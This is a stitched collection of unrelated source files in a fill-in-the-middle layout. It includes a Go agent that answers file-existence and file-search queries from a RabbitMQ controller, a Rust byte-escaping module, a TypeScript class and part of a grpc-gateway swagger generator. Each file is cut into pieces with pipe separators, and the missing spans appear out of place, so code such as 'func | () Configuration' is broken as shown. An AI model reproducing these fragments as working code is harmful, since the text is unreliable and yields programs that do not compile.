		log.Println("Reply send failed.")
	}
}
// ---------------------------------------------------------------------------------------------------------------------
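// An illustrative payload for the message below (field names follow the structs
// above; the values are hypothetical):
//   {"Request":{"Operation":2,"FilePath":"/var/log/app.log","Term":"ERROR"},"Uuid":"123e4567"}
// Operation 1 only checks that FilePath exists; operation 2 additionally
// searches the file contents for Term.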
func processMessage(controller string, message []byte) {
operationMessage := OperationMessage{}
err := json.Unmarshal(message, &operationMessage)
	if err != nil {
		log.Println("JSON decoding error")
		return
	}
operationRequest := operationMessage.Request
uuid := operationMessage.Uuid
if operationRequest.Operation == 1 {
if _, err := os.Stat(operationRequest.FilePath); err == nil {
reply(controller, uuid, true)
} else {
reply(controller, uuid, false)
}
} else if (operationRequest.Operation == 2) {
if _, err := os.Stat(operationRequest.FilePath); err == nil {
content, err := ioutil.ReadFile(operationRequest.FilePath)
			if err != nil {
				log.Println("Cannot read file")
				reply(controller, uuid, false)
				return
			}
if strings.Contains(string(content), operationRequest.Term) {
reply(controller, uuid, true)
} else {
reply(controller, uuid, false)
}
} else {
reply(controller, uuid, false)
}
}
}
// ---------------------------------------------------------------------------------------------------------------------
func connectToMq(controller string, mqConnString string) {
connection, err := amqp.Dial(mqConnString)
failOnError(err, "Failed to connect to RabbitMQ")
defer connection.Close()
channel, err := connection.Channel()
failOnError(err, "Failed to open a channel")
defer channel.Close()
err = channel.ExchangeDeclare(
"kodayif", // name
"fanout", // type
true , // durable
false, // auto-deleted
false, // internal
false, // no-wait
nil, // arguments
)
failOnError(err, "Failed to declare an exchange")
queue, err := channel.QueueDeclare(
"", // name
false, // durable
		false, // delete when unused
true, // exclusive
false, // no-wait
nil, // arguments
)
failOnError(err, "Failed to declare a queue")
err = channel.QueueBind(
queue.Name, // queue name
"", // routing key
"kodayif", // exchange
false,
nil,
)
failOnError(err, "Failed to bind a queue")
msgs, err := channel.Consume(
queue.Name, // queue
"", // consumer
true, // auto-ack
false, // exclusive
false, // no-local
false, // no-wait
nil, // args
)
failOnError(err, "Failed to register a consumer")
forever := make(chan bool)
go func() {
for msg := range msgs {
processMessage(controller, msg.Body)
}
}()
log.Printf(" [*] Waiting for messages. To exit press CTRL+C")
<-forever
}
// ---------------------------------------------------------------------------------------------------------------------
func | () Configuration {
file, err := os.Open(CONFIGURATION_FILE)
if err != nil {
log.Fatal("Couldn't read config file!")
}
decoder := json.NewDecoder(file)
configuration := Configuration{}
err = decoder.Decode(&configuration)
if err != nil {
log.Fatal("Syntax error in configuration file.")
}
return configuration
}
// ---------------------------------------------------------------------------------------------------------------------
func ipLookUp() string {
interfaces, err := net.Interfaces()
if err != nil {
log.Println("Couln't fetch interface list")
}
for _, i := range interfaces {
addrs, _ := i.Addrs()
for _, addr := range addrs {
address := addr.String()
if !strings.HasPrefix(address, "127") && !strings.HasPrefix(address, ":") {
return strings.Split(address, "/")[0]
}
}
}
return ""
}
// ---------------------------------------------------------------------------------------------------------------------
func main() {
ipAddress = ipLookUp()
if (ipAddress == "") {
log.Fatal("Couldn't find a valid interface address")
}
configuration := parseConfiguration()
connectToMq(configuration.Controller, configuration.MqConnString)
}
| parseConfiguration |
bytes.rs | use byteorder::{ByteOrder, LittleEndian};
// Encode unescaped with correct endian-ness
pub fn write_esc_u32(buf: &mut Vec<u8>,
x: u32) -> usize {
let mut unescaped_buf = [0; 4];
LittleEndian::write_u32(&mut unescaped_buf, x);
write_esc(buf, &unescaped_buf)
}
// Encode unescaped with correct endian-ness
pub fn write_esc_u64(buf: &mut Vec<u8>,
x: u64) -> usize {
let mut unescaped_buf = [0; 8];
LittleEndian::write_u64(&mut unescaped_buf, x);
write_esc(buf, &unescaped_buf)
}
pub fn write_esc(buf: &mut Vec<u8>,
bytes: &[u8]) -> usize {
let mut written = 0;
for b in bytes {
match *b {
10 => { buf.push(b'\\');
buf.push(b'n');
written += 2;
},
13 => { buf.push(b'\\');
buf.push(b'r');
written += 2;
},
92 => { buf.push(b'\\');
buf.push(b'\\');
written += 2;
},
_ => { buf.push(*b);
written += 1;
}
}
}
written
}
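// A minimal round-trip sketch (illustrative only): little-endian bytes equal to
// 0x0A, 0x0D or 0x5C are escaped on write, and the matching read undoes the
// escaping and reports how many input bytes it consumed.
//
//     let mut buf = Vec::new();
//     let written = write_esc_u32(&mut buf, 0x0A0D_5C01);
//     let (x, consumed) = read_esc_u32_at(&buf, 0);
//     assert_eq!(x, 0x0A0D_5C01);
//     assert_eq!(consumed, written); // 7 bytes: three escaped, one literal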
pub fn read_esc_u32_at(input: &[u8], j: usize) -> (u32, usize) {
let mut buf = Vec::<u8>::new();
let mut esc = false;
let mut read = 0;
let mut i = j;
while read < 4 {
let c = input[i];
i += 1;
if esc {
esc = false;
match c {
b'n' => buf.push(10),
b'r' => buf.push(13),
b'\\' => buf.push(92),
o => panic!("Invalid escape!: {}", o)
}
read += 1;
} else {
if c == 92 | else {
buf.push(c);
read += 1;
}
}
}
(LittleEndian::read_u32(&buf), i - j)
}
pub fn read_esc_u64_at(input: &[u8], j: usize) -> (u64, usize) {
let mut buf = Vec::<u8>::new();
let mut esc = false;
let mut read = 0;
let mut i = j;
while read < 8 {
let c = input[i];
i += 1;
if esc {
esc = false;
match c {
b'n' => buf.push(10),
b'r' => buf.push(13),
b'\\' => buf.push(92),
o => panic!("Invalid escape!: {}", o)
}
read += 1;
} else {
if c == 92 {
esc = true;
} else {
buf.push(c);
read += 1;
}
}
}
(LittleEndian::read_u64(&buf), i - j)
} | {
esc = true;
} |
box.ts | export class | {
index: number;
constructor(index: number) {
this.index = index;
}
} | Box |
template.go | package genswagger
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"os"
"reflect"
"regexp"
"sort"
"strconv"
"strings"
"sync"
"text/template"
"github.com/golang/glog"
"github.com/golang/protobuf/jsonpb"
"github.com/golang/protobuf/proto"
pbdescriptor "github.com/golang/protobuf/protoc-gen-go/descriptor"
structpb "github.com/golang/protobuf/ptypes/struct"
"github.com/grpc-ecosystem/grpc-gateway/internal/casing"
"github.com/grpc-ecosystem/grpc-gateway/protoc-gen-grpc-gateway/descriptor"
swagger_options "github.com/grpc-ecosystem/grpc-gateway/protoc-gen-swagger/options"
)
var wktSchemas = map[string]schemaCore{
".google.protobuf.Timestamp": schemaCore{
Type: "string",
Format: "date-time",
},
".google.protobuf.Duration": schemaCore{
Type: "string",
},
".google.protobuf.StringValue": schemaCore{
Type: "string",
},
".google.protobuf.BytesValue": schemaCore{
Type: "string",
Format: "byte",
},
".google.protobuf.Int32Value": schemaCore{
Type: "integer",
Format: "int32",
},
".google.protobuf.UInt32Value": schemaCore{
Type: "integer",
Format: "int64",
},
".google.protobuf.Int64Value": schemaCore{
Type: "string",
Format: "int64",
},
".google.protobuf.UInt64Value": schemaCore{
Type: "string",
Format: "uint64",
},
".google.protobuf.FloatValue": schemaCore{
Type: "number",
Format: "float",
},
".google.protobuf.DoubleValue": schemaCore{
Type: "number",
Format: "double",
},
".google.protobuf.BoolValue": schemaCore{
Type: "boolean",
Format: "boolean",
},
".google.protobuf.Empty": schemaCore{},
".google.protobuf.Struct": schemaCore{
Type: "object",
},
".google.protobuf.Value": schemaCore{
Type: "object",
},
".google.protobuf.ListValue": schemaCore{
Type: "array",
Items: (*swaggerItemsObject)(&schemaCore{
Type: "object",
}),
},
".google.protobuf.NullValue": schemaCore{
Type: "string",
},
}
func listEnumNames(enum *descriptor.Enum) (names []string) {
for _, value := range enum.GetValue() {
names = append(names, value.GetName())
}
return names
}
func listEnumNumbers(enum *descriptor.Enum) (numbers []string) {
for _, value := range enum.GetValue() {
numbers = append(numbers, strconv.Itoa(int(value.GetNumber())))
}
return
}
func getEnumDefault(enum *descriptor.Enum) string {
for _, value := range enum.GetValue() {
if value.GetNumber() == 0 {
return value.GetName()
}
}
return ""
}
// messageToQueryParameters converts a message to a list of swagger query parameters.
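// For example (sketch): a request message with scalar fields `name` and
// `page_size` yields query parameters `name` and `page_size` (or `pageSize`
// when JSON names are enabled); fields already bound as path parameters are
// skipped.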
func messageToQueryParameters(message *descriptor.Message, reg *descriptor.Registry, pathParams []descriptor.Parameter) (params []swaggerParameterObject, err error) {
for _, field := range message.Fields {
p, err := queryParams(message, field, "", reg, pathParams)
if err != nil {
return nil, err
}
params = append(params, p...)
}
return params, nil
}
// queryParams converts a field to a list of swagger query parameters recursively through the use of nestedQueryParams.
func queryParams(message *descriptor.Message, field *descriptor.Field, prefix string, reg *descriptor.Registry, pathParams []descriptor.Parameter) (params []swaggerParameterObject, err error) {
return nestedQueryParams(message, field, prefix, reg, pathParams, map[string]bool{})
}
// nestedQueryParams converts a field to a list of swagger query parameters recursively.
// This function is a helper function for queryParams, that keeps track of cyclical message references
// through the use of
// touched map[string]bool
// If a cycle is discovered, an error is returned, as cyclical data structures aren't allowed
// in query parameters.
func nestedQueryParams(message *descriptor.Message, field *descriptor.Field, prefix string, reg *descriptor.Registry, pathParams []descriptor.Parameter, touched map[string]bool) (params []swaggerParameterObject, err error) {
// make sure the parameter is not already listed as a path parameter
for _, pathParam := range pathParams {
if pathParam.Target == field {
return nil, nil
}
}
schema := schemaOfField(field, reg, nil)
fieldType := field.GetTypeName()
if message.File != nil {
comments := fieldProtoComments(reg, message, field)
if err := updateSwaggerDataFromComments(reg, &schema, message, comments, false); err != nil {
return nil, err
}
}
isEnum := field.GetType() == pbdescriptor.FieldDescriptorProto_TYPE_ENUM
items := schema.Items
if schema.Type != "" || isEnum {
if schema.Type == "object" {
return nil, nil // TODO: currently, mapping object in query parameter is not supported
}
if items != nil && (items.Type == "" || items.Type == "object") && !isEnum {
return nil, nil // TODO: currently, mapping object in query parameter is not supported
}
desc := schema.Description
if schema.Title != "" { // merge title because title of parameter object will be ignored
desc = strings.TrimSpace(schema.Title + ". " + schema.Description)
}
// verify if the field is required
required := false
for _, fieldName := range schema.Required {
if fieldName == field.GetName() {
required = true
break
}
}
param := swaggerParameterObject{
Description: desc,
In: "query",
Default: schema.Default,
Type: schema.Type,
Items: schema.Items,
Format: schema.Format,
Required: required,
}
if param.Type == "array" {
param.CollectionFormat = "multi"
}
if reg.GetUseJSONNamesForFields() {
param.Name = prefix + field.GetJsonName()
} else {
param.Name = prefix + field.GetName()
}
if isEnum {
enum, err := reg.LookupEnum("", fieldType)
if err != nil {
return nil, fmt.Errorf("unknown enum type %s", fieldType)
}
if items != nil { // array
param.Items = &swaggerItemsObject{
Type: "string",
Enum: listEnumNames(enum),
}
if reg.GetEnumsAsInts() {
param.Items.Type = "integer"
param.Items.Enum = listEnumNumbers(enum)
}
} else {
param.Type = "string"
param.Enum = listEnumNames(enum)
param.Default = getEnumDefault(enum)
if reg.GetEnumsAsInts() {
param.Type = "integer"
param.Enum = listEnumNumbers(enum)
param.Default = "0"
}
}
valueComments := enumValueProtoComments(reg, enum)
if valueComments != "" {
param.Description = strings.TrimLeft(param.Description+"\n\n "+valueComments, "\n")
}
}
return []swaggerParameterObject{param}, nil | // nested type, recurse
msg, err := reg.LookupMsg("", fieldType)
if err != nil {
return nil, fmt.Errorf("unknown message type %s", fieldType)
}
// Check for cyclical message reference:
isCycle := touched[*msg.Name]
if isCycle {
return nil, fmt.Errorf("Recursive types are not allowed for query parameters, cycle found on %q", fieldType)
}
	// Update the map with the message name so a cycle further down the recursive path can be detected.
touched[*msg.Name] = true
for _, nestedField := range msg.Fields {
var fieldName string
if reg.GetUseJSONNamesForFields() {
fieldName = field.GetJsonName()
} else {
fieldName = field.GetName()
}
p, err := nestedQueryParams(msg, nestedField, prefix+fieldName+".", reg, pathParams, touched)
if err != nil {
return nil, err
}
params = append(params, p...)
}
return params, nil
}
// findServicesMessagesAndEnumerations discovers all messages and enums defined in the RPC methods of the service.
func findServicesMessagesAndEnumerations(s []*descriptor.Service, reg *descriptor.Registry, m messageMap, ms messageMap, e enumMap, refs refMap) {
for _, svc := range s {
for _, meth := range svc.Methods {
// Request may be fully included in query
{
swgReqName, ok := fullyQualifiedNameToSwaggerName(meth.RequestType.FQMN(), reg)
if !ok {
glog.Errorf("couldn't resolve swagger name for FQMN '%v'", meth.RequestType.FQMN())
continue
}
if _, ok := refs[fmt.Sprintf("#/definitions/%s", swgReqName)]; ok {
if !skipRenderingRef(meth.RequestType.FQMN()) {
m[swgReqName] = meth.RequestType
}
}
}
swgRspName, ok := fullyQualifiedNameToSwaggerName(meth.ResponseType.FQMN(), reg)
if !ok && !skipRenderingRef(meth.ResponseType.FQMN()) {
glog.Errorf("couldn't resolve swagger name for FQMN '%v'", meth.ResponseType.FQMN())
continue
}
findNestedMessagesAndEnumerations(meth.RequestType, reg, m, e)
if !skipRenderingRef(meth.ResponseType.FQMN()) {
m[swgRspName] = meth.ResponseType
if meth.GetServerStreaming() {
streamError, runtimeStreamError, err := lookupMsgAndSwaggerName(".grpc.gateway.runtime", "StreamError", reg)
if err != nil {
glog.Error(err)
} else {
glog.V(1).Infof("StreamError: %v", streamError)
glog.V(1).Infof("StreamError FQMN: %s", runtimeStreamError)
m[runtimeStreamError] = streamError
findNestedMessagesAndEnumerations(streamError, reg, m, e)
}
ms[swgRspName] = meth.ResponseType
}
}
findNestedMessagesAndEnumerations(meth.ResponseType, reg, m, e)
}
}
}
// findNestedMessagesAndEnumerations those can be generated by the services.
func findNestedMessagesAndEnumerations(message *descriptor.Message, reg *descriptor.Registry, m messageMap, e enumMap) {
	// Iterate over all the fields in the message.
for _, t := range message.Fields {
fieldType := t.GetTypeName()
// If the type is an empty string then it is a proto primitive
if fieldType != "" {
if _, ok := m[fieldType]; !ok {
msg, err := reg.LookupMsg("", fieldType)
if err != nil {
enum, err := reg.LookupEnum("", fieldType)
if err != nil {
panic(err)
}
e[fieldType] = enum
continue
}
m[fieldType] = msg
findNestedMessagesAndEnumerations(msg, reg, m, e)
}
}
}
}
func skipRenderingRef(refName string) bool {
_, ok := wktSchemas[refName]
return ok
}
func renderMessagesAsDefinition(messages messageMap, d swaggerDefinitionsObject, reg *descriptor.Registry, customRefs refMap) {
for name, msg := range messages {
swgName, ok := fullyQualifiedNameToSwaggerName(msg.FQMN(), reg)
if !ok {
panic(fmt.Sprintf("can't resolve swagger name from '%v'", msg.FQMN()))
}
if skipRenderingRef(name) {
continue
}
if opt := msg.GetOptions(); opt != nil && opt.MapEntry != nil && *opt.MapEntry {
continue
}
schema := swaggerSchemaObject{
schemaCore: schemaCore{
Type: "object",
},
}
msgComments := protoComments(reg, msg.File, msg.Outers, "MessageType", int32(msg.Index))
if err := updateSwaggerDataFromComments(reg, &schema, msg, msgComments, false); err != nil {
panic(err)
}
opts, err := extractSchemaOptionFromMessageDescriptor(msg.DescriptorProto)
if err != nil {
panic(err)
}
if opts != nil {
protoSchema := swaggerSchemaFromProtoSchema(opts, reg, customRefs, msg)
// Warning: Make sure not to overwrite any fields already set on the schema type.
schema.ExternalDocs = protoSchema.ExternalDocs
schema.ReadOnly = protoSchema.ReadOnly
schema.MultipleOf = protoSchema.MultipleOf
schema.Maximum = protoSchema.Maximum
schema.ExclusiveMaximum = protoSchema.ExclusiveMaximum
schema.Minimum = protoSchema.Minimum
schema.ExclusiveMinimum = protoSchema.ExclusiveMinimum
schema.MaxLength = protoSchema.MaxLength
schema.MinLength = protoSchema.MinLength
schema.Pattern = protoSchema.Pattern
schema.Default = protoSchema.Default
schema.MaxItems = protoSchema.MaxItems
schema.MinItems = protoSchema.MinItems
schema.UniqueItems = protoSchema.UniqueItems
schema.MaxProperties = protoSchema.MaxProperties
schema.MinProperties = protoSchema.MinProperties
schema.Required = protoSchema.Required
if protoSchema.schemaCore.Type != "" || protoSchema.schemaCore.Ref != "" {
schema.schemaCore = protoSchema.schemaCore
}
if protoSchema.Title != "" {
schema.Title = protoSchema.Title
}
if protoSchema.Description != "" {
schema.Description = protoSchema.Description
}
if protoSchema.Example != nil {
schema.Example = protoSchema.Example
}
}
for _, f := range msg.Fields {
fieldValue := schemaOfField(f, reg, customRefs)
comments := fieldProtoComments(reg, msg, f)
if err := updateSwaggerDataFromComments(reg, &fieldValue, f, comments, false); err != nil {
panic(err)
}
kv := keyVal{Value: fieldValue}
if reg.GetUseJSONNamesForFields() {
kv.Key = f.GetJsonName()
} else {
kv.Key = f.GetName()
}
if schema.Properties == nil {
schema.Properties = &swaggerSchemaObjectProperties{}
}
*schema.Properties = append(*schema.Properties, kv)
}
d[swgName] = schema
}
}
// schemaOfField returns a swagger Schema Object for a protobuf field.
func schemaOfField(f *descriptor.Field, reg *descriptor.Registry, refs refMap) swaggerSchemaObject {
const (
singular = 0
array = 1
object = 2
)
var (
core schemaCore
aggregate int
)
fd := f.FieldDescriptorProto
if m, err := reg.LookupMsg("", f.GetTypeName()); err == nil {
if opt := m.GetOptions(); opt != nil && opt.MapEntry != nil && *opt.MapEntry {
fd = m.GetField()[1]
aggregate = object
}
}
if fd.GetLabel() == pbdescriptor.FieldDescriptorProto_LABEL_REPEATED {
aggregate = array
}
var props *swaggerSchemaObjectProperties
switch ft := fd.GetType(); ft {
case pbdescriptor.FieldDescriptorProto_TYPE_ENUM, pbdescriptor.FieldDescriptorProto_TYPE_MESSAGE, pbdescriptor.FieldDescriptorProto_TYPE_GROUP:
if wktSchema, ok := wktSchemas[fd.GetTypeName()]; ok {
core = wktSchema
if fd.GetTypeName() == ".google.protobuf.Empty" {
props = &swaggerSchemaObjectProperties{}
}
} else {
swgRef, ok := fullyQualifiedNameToSwaggerName(fd.GetTypeName(), reg)
if !ok {
panic(fmt.Sprintf("can't resolve swagger ref from typename '%v'", fd.GetTypeName()))
}
core = schemaCore{
Ref: "#/definitions/" + swgRef,
}
if refs != nil {
refs[fd.GetTypeName()] = struct{}{}
}
}
default:
ftype, format, ok := primitiveSchema(ft)
if ok {
core = schemaCore{Type: ftype, Format: format}
} else {
core = schemaCore{Type: ft.String(), Format: "UNKNOWN"}
}
}
ret := swaggerSchemaObject{}
switch aggregate {
case array:
ret = swaggerSchemaObject{
schemaCore: schemaCore{
Type: "array",
Items: (*swaggerItemsObject)(&core),
},
}
case object:
ret = swaggerSchemaObject{
schemaCore: schemaCore{
Type: "object",
},
AdditionalProperties: &swaggerSchemaObject{Properties: props, schemaCore: core},
}
default:
ret = swaggerSchemaObject{
schemaCore: core,
Properties: props,
}
}
if j, err := extractJSONSchemaFromFieldDescriptor(fd); err == nil {
updateSwaggerObjectFromJSONSchema(&ret, j, reg, f)
}
return ret
}
// primitiveSchema returns a pair of "Type" and "Format" in JSON Schema for
// the given primitive field type.
// The last return parameter is true iff the field type is actually primitive.
func primitiveSchema(t pbdescriptor.FieldDescriptorProto_Type) (ftype, format string, ok bool) {
switch t {
case pbdescriptor.FieldDescriptorProto_TYPE_DOUBLE:
return "number", "double", true
case pbdescriptor.FieldDescriptorProto_TYPE_FLOAT:
return "number", "float", true
case pbdescriptor.FieldDescriptorProto_TYPE_INT64:
return "string", "int64", true
case pbdescriptor.FieldDescriptorProto_TYPE_UINT64:
// 64bit integer types are marshaled as string in the default JSONPb marshaler.
// TODO(yugui) Add an option to declare 64bit integers as int64.
//
// NOTE: uint64 is not a predefined format of integer type in Swagger spec.
// So we cannot expect that uint64 is commonly supported by swagger processor.
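		// For example, an int64/uint64 field holding 42 is emitted as the
		// JSON string "42" rather than the number 42.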
return "string", "uint64", true
case pbdescriptor.FieldDescriptorProto_TYPE_INT32:
return "integer", "int32", true
case pbdescriptor.FieldDescriptorProto_TYPE_FIXED64:
// Ditto.
return "string", "uint64", true
case pbdescriptor.FieldDescriptorProto_TYPE_FIXED32:
// Ditto.
return "integer", "int64", true
case pbdescriptor.FieldDescriptorProto_TYPE_BOOL:
return "boolean", "boolean", true
case pbdescriptor.FieldDescriptorProto_TYPE_STRING:
		// NOTE: in the Swagger specification, format should be empty on the string type
return "string", "", true
case pbdescriptor.FieldDescriptorProto_TYPE_BYTES:
return "string", "byte", true
case pbdescriptor.FieldDescriptorProto_TYPE_UINT32:
// Ditto.
return "integer", "int64", true
case pbdescriptor.FieldDescriptorProto_TYPE_SFIXED32:
return "integer", "int32", true
case pbdescriptor.FieldDescriptorProto_TYPE_SFIXED64:
return "string", "int64", true
case pbdescriptor.FieldDescriptorProto_TYPE_SINT32:
return "integer", "int32", true
case pbdescriptor.FieldDescriptorProto_TYPE_SINT64:
return "string", "int64", true
default:
return "", "", false
}
}
// renderEnumerationsAsDefinition inserts enums into the definitions object.
func renderEnumerationsAsDefinition(enums enumMap, d swaggerDefinitionsObject, reg *descriptor.Registry) {
for _, enum := range enums {
swgName, ok := fullyQualifiedNameToSwaggerName(enum.FQEN(), reg)
if !ok {
panic(fmt.Sprintf("can't resolve swagger name from FQEN '%v'", enum.FQEN()))
}
enumComments := protoComments(reg, enum.File, enum.Outers, "EnumType", int32(enum.Index))
// it may be necessary to sort the result of the GetValue function.
enumNames := listEnumNames(enum)
defaultValue := getEnumDefault(enum)
valueComments := enumValueProtoComments(reg, enum)
if valueComments != "" {
enumComments = strings.TrimLeft(enumComments+"\n\n "+valueComments, "\n")
}
enumSchemaObject := swaggerSchemaObject{
schemaCore: schemaCore{
Type: "string",
Enum: enumNames,
Default: defaultValue,
},
}
if reg.GetEnumsAsInts() {
enumSchemaObject.Type = "integer"
enumSchemaObject.Format = "int32"
enumSchemaObject.Default = "0"
enumSchemaObject.Enum = listEnumNumbers(enum)
}
if err := updateSwaggerDataFromComments(reg, &enumSchemaObject, enum, enumComments, false); err != nil {
panic(err)
}
d[swgName] = enumSchemaObject
}
}
// Take in a FQMN or FQEN and return a swagger safe version of the FQMN and
// a boolean indicating if FQMN was properly resolved.
func fullyQualifiedNameToSwaggerName(fqn string, reg *descriptor.Registry) (string, bool) {
registriesSeenMutex.Lock()
defer registriesSeenMutex.Unlock()
if mapping, present := registriesSeen[reg]; present {
ret, ok := mapping[fqn]
return ret, ok
}
mapping := resolveFullyQualifiedNameToSwaggerNames(append(reg.GetAllFQMNs(), reg.GetAllFQENs()...), reg.GetUseFQNForSwaggerName())
registriesSeen[reg] = mapping
ret, ok := mapping[fqn]
return ret, ok
}
// Lookup message type by location.name and return a swagger-safe version
// of its FQMN.
func lookupMsgAndSwaggerName(location, name string, reg *descriptor.Registry) (*descriptor.Message, string, error) {
msg, err := reg.LookupMsg(location, name)
if err != nil {
return nil, "", err
}
swgName, ok := fullyQualifiedNameToSwaggerName(msg.FQMN(), reg)
if !ok {
return nil, "", fmt.Errorf("can't map swagger name from FQMN '%v'", msg.FQMN())
}
return msg, swgName, nil
}
// registriesSeen is used to memoise calls to resolveFullyQualifiedNameToSwaggerNames so
// we don't repeat it unnecessarily, since it can take some time.
var registriesSeen = map[*descriptor.Registry]map[string]string{}
var registriesSeenMutex sync.Mutex
// Take the names of every proto and "uniq-ify" them. The idea is to produce a
// set of names that meet a couple of conditions. They must be stable, they
// must be unique, and they must be shorter than the FQN.
//
// This likely could be made better. This will always generate the same names
// but may not always produce optimal names. This is a reasonably close
// approximation of what they should look like in most cases.
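// A rough illustration (hypothetical FQMNs): given ".a.b.C" and ".x.d.E",
// the resolved names come out as "bC" and "dE": the unique suffix plus one
// enclosing package level, joined without separators.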
func resolveFullyQualifiedNameToSwaggerNames(messages []string, useFQNForSwaggerName bool) map[string]string {
packagesByDepth := make(map[int][][]string)
uniqueNames := make(map[string]string)
hierarchy := func(pkg string) []string {
return strings.Split(pkg, ".")
}
for _, p := range messages {
h := hierarchy(p)
for depth := range h {
if _, ok := packagesByDepth[depth]; !ok {
packagesByDepth[depth] = make([][]string, 0)
}
packagesByDepth[depth] = append(packagesByDepth[depth], h[len(h)-depth:])
}
}
count := func(list [][]string, item []string) int {
i := 0
for _, element := range list {
if reflect.DeepEqual(element, item) {
i++
}
}
return i
}
for _, p := range messages {
if useFQNForSwaggerName {
// strip leading dot from proto fqn
uniqueNames[p] = p[1:]
} else {
h := hierarchy(p)
for depth := 0; depth < len(h); depth++ {
if count(packagesByDepth[depth], h[len(h)-depth:]) == 1 {
uniqueNames[p] = strings.Join(h[len(h)-depth-1:], "")
break
}
if depth == len(h)-1 {
uniqueNames[p] = strings.Join(h, "")
}
}
}
}
return uniqueNames
}
var canRegexp = regexp.MustCompile("{([a-zA-Z][a-zA-Z0-9_.]*).*}")
// Swagger expects paths of the form /path/{string_value} but grpc-gateway paths are expected to be of the form /path/{string_value=strprefix/*}. This should reformat it correctly.
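// For example (sketch): "/v1/{shelf=shelves/*}/books" becomes "/v1/{shelf}/books",
// while resource-name fields such as "{name=projects/*}" keep their pattern so the
// format information is retained (see isResourceName below).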
func templateToSwaggerPath(path string, reg *descriptor.Registry, fields []*descriptor.Field, msgs []*descriptor.Message) string {
// It seems like the right thing to do here is to just use
// strings.Split(path, "/") but that breaks badly when you hit a url like
// /{my_field=prefix/*}/ and end up with 2 sections representing my_field.
	// Instead do the right thing and write a small pushdown (counter) automaton
// for it.
var parts []string
depth := 0
buffer := ""
jsonBuffer := ""
for _, char := range path {
switch char {
case '{':
// Push on the stack
depth++
buffer += string(char)
jsonBuffer = ""
jsonBuffer += string(char)
break
case '}':
if depth == 0 {
panic("Encountered } without matching { before it.")
}
// Pop from the stack
depth--
buffer += string(char)
if reg.GetUseJSONNamesForFields() &&
len(jsonBuffer) > 1 {
jsonSnakeCaseName := string(jsonBuffer[1:])
jsonCamelCaseName := string(lowerCamelCase(jsonSnakeCaseName, fields, msgs))
prev := string(buffer[:len(buffer)-len(jsonSnakeCaseName)-2])
buffer = strings.Join([]string{prev, "{", jsonCamelCaseName, "}"}, "")
jsonBuffer = ""
}
case '/':
if depth == 0 {
parts = append(parts, buffer)
buffer = ""
// Since the stack was empty when we hit the '/' we are done with this
// section.
continue
}
buffer += string(char)
jsonBuffer += string(char)
default:
buffer += string(char)
jsonBuffer += string(char)
break
}
}
// Now append the last element to parts
parts = append(parts, buffer)
	// Parts is now an array of segments of the path. The syntax of each
	// segment can be handled by a regexp, since it has no memory.
for index, part := range parts {
// If part is a resource name such as "parent", "name", "user.name", the format info must be retained.
prefix := canRegexp.ReplaceAllString(part, "$1")
if isResourceName(prefix) {
continue
}
parts[index] = canRegexp.ReplaceAllString(part, "{$1}")
}
return strings.Join(parts, "/")
}
func isResourceName(prefix string) bool {
words := strings.Split(prefix, ".")
l := len(words)
field := words[l-1]
words = strings.Split(field, ":")
field = words[0]
return field == "parent" || field == "name"
}
func renderServices(services []*descriptor.Service, paths swaggerPathsObject, reg *descriptor.Registry, requestResponseRefs, customRefs refMap, msgs []*descriptor.Message) error {
// Correctness of svcIdx and methIdx depends on 'services' containing the services in the same order as the 'file.Service' array.
for svcIdx, svc := range services {
for methIdx, meth := range svc.Methods {
for bIdx, b := range meth.Bindings {
// Iterate over all the swagger parameters
parameters := swaggerParametersObject{}
for _, parameter := range b.PathParams {
var paramType, paramFormat, desc, collectionFormat, defaultValue string
var enumNames []string
var items *swaggerItemsObject
var minItems *int
switch pt := parameter.Target.GetType(); pt {
case pbdescriptor.FieldDescriptorProto_TYPE_GROUP, pbdescriptor.FieldDescriptorProto_TYPE_MESSAGE:
if descriptor.IsWellKnownType(parameter.Target.GetTypeName()) {
if parameter.IsRepeated() {
return fmt.Errorf("only primitive and enum types are allowed in repeated path parameters")
}
schema := schemaOfField(parameter.Target, reg, customRefs)
paramType = schema.Type
paramFormat = schema.Format
desc = schema.Description
defaultValue = schema.Default
} else {
return fmt.Errorf("only primitive and well-known types are allowed in path parameters")
}
case pbdescriptor.FieldDescriptorProto_TYPE_ENUM:
enum, err := reg.LookupEnum("", parameter.Target.GetTypeName())
if err != nil {
return err
}
paramType = "string"
paramFormat = ""
enumNames = listEnumNames(enum)
if reg.GetEnumsAsInts() {
paramType = "integer"
paramFormat = ""
enumNames = listEnumNumbers(enum)
}
schema := schemaOfField(parameter.Target, reg, customRefs)
desc = schema.Description
defaultValue = schema.Default
default:
var ok bool
paramType, paramFormat, ok = primitiveSchema(pt)
if !ok {
return fmt.Errorf("unknown field type %v", pt)
}
schema := schemaOfField(parameter.Target, reg, customRefs)
desc = schema.Description
defaultValue = schema.Default
}
if parameter.IsRepeated() {
core := schemaCore{Type: paramType, Format: paramFormat}
if parameter.IsEnum() {
var s []string
core.Enum = enumNames
enumNames = s
}
items = (*swaggerItemsObject)(&core)
paramType = "array"
paramFormat = ""
collectionFormat = reg.GetRepeatedPathParamSeparatorName()
minItems = new(int)
*minItems = 1
}
if desc == "" {
desc = fieldProtoComments(reg, parameter.Target.Message, parameter.Target)
}
parameterString := parameter.String()
if reg.GetUseJSONNamesForFields() {
parameterString = lowerCamelCase(parameterString, meth.RequestType.Fields, msgs)
}
parameters = append(parameters, swaggerParameterObject{
Name: parameterString,
Description: desc,
In: "path",
Required: true,
Default: defaultValue,
// Parameters in gRPC-Gateway can only be strings?
Type: paramType,
Format: paramFormat,
Enum: enumNames,
Items: items,
CollectionFormat: collectionFormat,
MinItems: minItems,
})
}
// Now check if there is a body parameter
if b.Body != nil {
var schema swaggerSchemaObject
desc := ""
if len(b.Body.FieldPath) == 0 {
schema = swaggerSchemaObject{
schemaCore: schemaCore{},
}
wknSchemaCore, isWkn := wktSchemas[meth.RequestType.FQMN()]
if !isWkn {
err := schema.setRefFromFQN(meth.RequestType.FQMN(), reg)
if err != nil {
return err
}
} else {
schema.schemaCore = wknSchemaCore
// Special workaround for Empty: it's well-known type but wknSchemas only returns schema.schemaCore; but we need to set schema.Properties which is a level higher.
if meth.RequestType.FQMN() == ".google.protobuf.Empty" {
schema.Properties = &swaggerSchemaObjectProperties{}
}
}
} else {
lastField := b.Body.FieldPath[len(b.Body.FieldPath)-1]
schema = schemaOfField(lastField.Target, reg, customRefs)
if schema.Description != "" {
desc = schema.Description
} else {
desc = fieldProtoComments(reg, lastField.Target.Message, lastField.Target)
}
}
if meth.GetClientStreaming() {
desc += " (streaming inputs)"
}
